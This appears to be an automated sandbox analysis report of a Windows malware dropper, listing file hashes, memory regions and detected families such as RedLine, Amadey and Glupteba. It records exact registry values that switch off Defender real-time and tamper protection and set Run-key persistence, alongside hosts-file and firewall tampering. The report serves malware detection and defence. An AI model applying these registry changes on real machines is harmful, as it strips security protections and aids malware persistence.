memory/2448-461-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2272-463-0x000000013FB50000-0x00000001400F1000-memory.dmp

memory/920-464-0x0000000000AF0000-0x0000000000B30000-memory.dmp

memory/2448-471-0x0000000004420000-0x0000000004D0B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O2X6Y6U3\hLRJ1GG_y0J[1].ico

MD5 8cddca427dae9b925e73432f8733e05a
SHA1 1999a6f624a25cfd938eef6492d34fdc4f55dedc
SHA256 89676a3fb8639d6531c525e5800ff4cc44d06d27ff5607922d27e390eb5b6e62
SHA512 20fbee2886995c253e762f2bb814ad16890b0989deab4d92394363ef0060b96a634d87c380c7ba1b787a8ab312be968fed9329a729b4e0d64235a09e397db740

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_7D28090A46C74E41A9A3E66B91EADD47

MD5 d2b758cc2cd384f922df0ce28a885171
SHA1 8779f2357cec66e7b11289dd0328cb4997ff53bd
SHA256 1ee729d67c03fcd01c8ccb89ffb810070e5440f52de5735917b23be54df116aa
SHA512 782b342447a4b52a4f29db1c8829bbde12cb6ecd6ee394c1f6b69640b9705498cb388cb63486340a8e6256685d839fb59962d716acf97f481b5a485d71b896fd

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O2X6Y6U3\favicon[1].ico

MD5 f3418a443e7d841097c714d69ec4bcb8
SHA1 49263695f6b0cdd72f45cf1b775e660fdc36c606
SHA256 6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA512 82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

memory/1284-592-0x00000000005D0000-0x00000000005D1000-memory.dmp

memory/1284-591-0x0000000005170000-0x00000000051B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/2544-611-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

memory/2544-612-0x0000000002090000-0x0000000002098000-memory.dmp

memory/1284-647-0x00000000005F0000-0x000000000060C000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

memory/1284-670-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-688-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-690-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-692-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-694-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-696-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-698-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-700-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-702-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-704-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-706-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-708-0x00000000005F0000-0x0000000000605000-memory.dmp

memory/1284-710-0x00000000005F0000-0x0000000000605000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 52723a238d03cd6af1cfc1b8a7963bf4
SHA1 39e8dcbf08f90c098d8bc8121a71233aa37ae7a5
SHA256 0d0296b3349d314703f822fcbc9dea0a3214bc5521f217b6b775be453a2b0e04
SHA512 688850e940716eca0d1f35f92076ca4e4b86b05008fff7ea9984b95e18dc95f86f2d521d46d9d4d95c2ff7ae65e1c86dc17c252e0f53a85253709c116facae8d

memory/2544-788-0x000007FEF5410000-0x000007FEF5DAD000-memory.dmp

memory/2544-797-0x0000000002864000-0x0000000002867000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d6fd5299a18f59b6be18425adbc641f5
SHA1 0e83d3cfcbbc7ba30a6788cee4fdda05bd78f067
SHA256 33624c24ddd3742cd72e462400127e99ff2b28b3a3666dc3f014f6dcf332fbbe
SHA512 179ad033873cbd57ed1598fd9b55ecd5274140f54d11aada4b308048421dd5aeec4a9388c461c8a3872bbe375c3568dd6d9bcb53ef108b47d35c15f5f6b22bff

memory/2544-807-0x000000000286B000-0x00000000028D2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 865112f524fb42c9db6c4c1e6590bee7
SHA1 7fe9a081add8ad100990bd6ce8f868a8430eda01
SHA256 d66b71211ca1318616cc50eed1cdb7a498a6d89ed0b1ca06bef545b07658a947
SHA512 a168e12ca5cdd05bbe285a0d791bd3b94e6051bed58ea917e60fdbba56e23f0c304b8c8d79501395a29539136dbe4e2253750a23d20a7deecef2b7f427d0b0a6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 97aee546638a1bdd39bc980e6c542a59
SHA1 1ac86c02f42ce5aafc7e63552c3b65baad027c5b
SHA256 3f7137aeae0f6aa76ac8c6f4eea5ad68e7e0d0ba50a65a03e5054780b5bd487b
SHA512 ea6a5de12349d0b9993f18a9b9a3f3bf6c0b9554d0006025d4d547048773d050d64a08e05d73ca288c3c78e4f5143d3697d5bb10a708d7e4fd300ea456a10fee

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f34693f98703e7529ab375867a89fb1e
SHA1 44f6403094715622e867beb8cbb4dd1aa91e17e5
SHA256 809b69613ee6095425484d214f0f63e61c0ffdf4b5aebd65ce83a7229d56b55c
SHA512 51a9496b6423f8e8f5083a49f29b9928306ec2701d2956427c4761dd2dc4973f3487781b1b730ec90168fea380d8f792236dd1d5962d70aa90acf743b2b57acc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 80d54768a2656ea4706e3ba8c4889045
SHA1 9f913246a375ddefdabdcb672aea392f49d5c585
SHA256 21399536ae10145764948f3742d8b2f6f426d17542ca9403a9a23cb742238595
SHA512 cbbadfe817f5f665a09514aa4cead55dd43c24d04c36e445fe43873f7a1059403b2c5d5c165409904bbd879d847eefffcc04d93f2ba71f5ea33491185ab7c467

memory/620-1004-0x0000000000400000-0x000000000047F000-memory.dmp

memory/620-1005-0x0000000000400000-0x000000000047F000-memory.dmp

memory/620-1006-0x0000000000400000-0x000000000047F000-memory.dmp

memory/620-1007-0x0000000000400000-0x000000000047F000-memory.dmp

memory/620-1009-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/620-1008-0x0000000000400000-0x000000000047F000-memory.dmp

memory/620-1011-0x0000000000400000-0x000000000047F000-memory.dmp

memory/620-1033-0x0000000000400000-0x000000000047F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2c8b74071943234582c7f2cb25421aa3
SHA1 fd9f225b9283c92877962e352bb1dfe315b8861b
SHA256 ac82150f12d706d1bde12df61f82a0ca8b22efc0e150caaae8b04b82c9a57682
SHA512 95f4bce7641e14a02c6f3581667ac9e64ab758654ff22033a3f2b299f940678d253da283779a544382b8aa5b6f0fc9a419d07958099baed991b648b7223c8780

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 366b3f74a32f80a25111f91e33cf93ff
SHA1 07c258165d056e7cb5099fc8b97fdfbfd096c6ac
SHA256 81bbafb0d1e091c512dc76281a02aef33826a9a7625281857e96e65fa4dce730
SHA512 3c62d5916363bbbcdbf9b74af525a1f71ba04ad0c73665db22763d4e31d357ddf80856c945bdf2440d5a4806858ef98ec991167cb598f3867ae432c718cd6f9e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 dbcf13d6195144d12d623c4d1b3709c6
SHA1 acad3fd50ff6858e0639d12685112973ec046987
SHA256 c4b9ebe9f6026f1acfadea9a30023656b72dfc7b187bece778c26f72ded78187
SHA512 a8151742d0dfc8508e72514e90dfe4a7651ee408a68a2e15708cfbc888a6b10e799810a46532e9a0436ec4addad2896dad7dd6dc78cc77d38240f2701255b8db

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b3647e4796ad6fb307185bd0d4125e85
SHA1 fcd6d5e335a717979938c0471f93bb118d963754
SHA256 efa27a2eae29cde78041c5215d2de058d970066ff999899c0a824cb6dd396451
SHA512 2f5c44f4d6545fed1688d4f427299620a384fee8a99f09c1cadbee106624f8cd1328e1b105bfc98e3ab1654b19ca90c70d69427d41eafba3f700b82a61d7be3e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a06c174a12320d12b0d6c894cb4f535a
SHA1 fd870f16fa2f7e005320be8fb583e3d6182c2499
SHA256 cf89bec1e95821a7a86b43544bb4316e83234fb4bc254324d05f0872848395b9
SHA512 a8537cb1ab66e0b037a5810df52536993ecb08a6498cbf4c1678b3aef59746cd3372548adcc8870979a8a2f10a6d606598e0d8bdd5a5e87c7f569edd83375fb7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 eaee94293a7fd23049fb78d359a98c87
SHA1 05ba0fa42350f631aec35fb75261e86d46a707fe
SHA256 e79a17ce56b0eed58081ab39358c808a88a05cc2f87b81f9c15bb95c1b88a751
SHA512 8abef50151df64d3a6a9fb76b764c69d98fc62b03cdd1984885677293d01af8f17729e839b5530f44b5dc266f5757df7cc6635ee89853f437f3050c9d22c6f7e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a0e0aee86c4fbaba222a431a2cd6f890
SHA1 2d48623f6f29550b4d1d01b671c92f146d405b94
SHA256 325a02dd58227871cd62ce5a28089f94ba99b552a696be3ef95c308d6606dbc3
SHA512 06659d490c57178b51262dea24187d39ee77549ab34fcdd442d784c3a2fd73fa035b29c6eec6bb4e17cb828e018b45d47d70fda08034f29ba8e8c25d903d11e8

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:37

Reported

2023-10-10 20:58

Platform

win10v2004-20230915-en

Max time kernel

135s

Max time network

179s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe N/A

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\37C9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6A06.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2DE3.bat N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9222412.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b0234193.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c8353730.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2A18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2CD8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZD37Ls8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2DE3.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\30C2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3160.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\37C9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pg975PN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6A06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\76C8.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8263.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\76C8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\76C8.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\3160.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\2A18.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW0xB4cw.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wg5mI1Lf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\a0781fda246cfa3fc019adbd2626e92197efcfb6fd80d73c49cd2cb579b5c8a0.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v5320653.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Im3XM9DI.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TT7kp0pz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\System32\powercfg.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
